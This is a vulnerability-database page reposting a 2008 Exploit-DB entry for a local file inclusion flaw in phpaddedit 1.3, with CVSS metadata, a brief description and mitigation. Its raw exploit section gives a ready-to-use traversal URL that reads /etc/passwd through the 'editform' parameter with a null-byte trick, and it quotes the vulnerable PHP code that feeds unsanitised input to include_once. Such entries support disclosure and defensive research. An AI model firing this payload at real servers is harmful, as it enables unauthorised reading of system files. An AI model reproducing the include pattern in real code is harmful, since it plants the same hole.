header-logo
Suggest Exploit
vendor:
phpaddedit
by:
nuclear
9.3
CVSS
HIGH
Local File Inclusion (LFI)
98
CWE
Product Name: phpaddedit
Affected Version From: 1.3
Affected Version To: 1.3
Patch Exists: NO
Related CWE: N/A
CPE: a:phpaddedit:phpaddedit:1.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

phpaddedit-1.3 LFI

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'editform' parameter to '/addedit-render.php' script. A remote attacker can include a file from a remote server, cause a denial of service, access potentially sensitive information, or execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files.
Source

Exploit-DB raw data:

#phpaddedit-1.3 LFI


#Author: nuclear


#script:http://sourceforge.net/projects/phpaddedit/


#vuln:http://target.com/addedit-render.php?editform=../../../../../../../etc/passwd%00


#vulnerable code:
if (!$formname && $_GET["editform"]) $formname = $_GET["editform"];
...
if ( $error_message || $error || !$_POST["submitval"] ) {
    include_once ($formname."-header.inc.php");
    include_once ($addeditcwd."addedit-create-form.php");
    include_once ($formname."-footer.inc.php");
}




#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r

# milw0rm.com [2008-12-10]

Navigation

Suggest Exploit

Services By CQR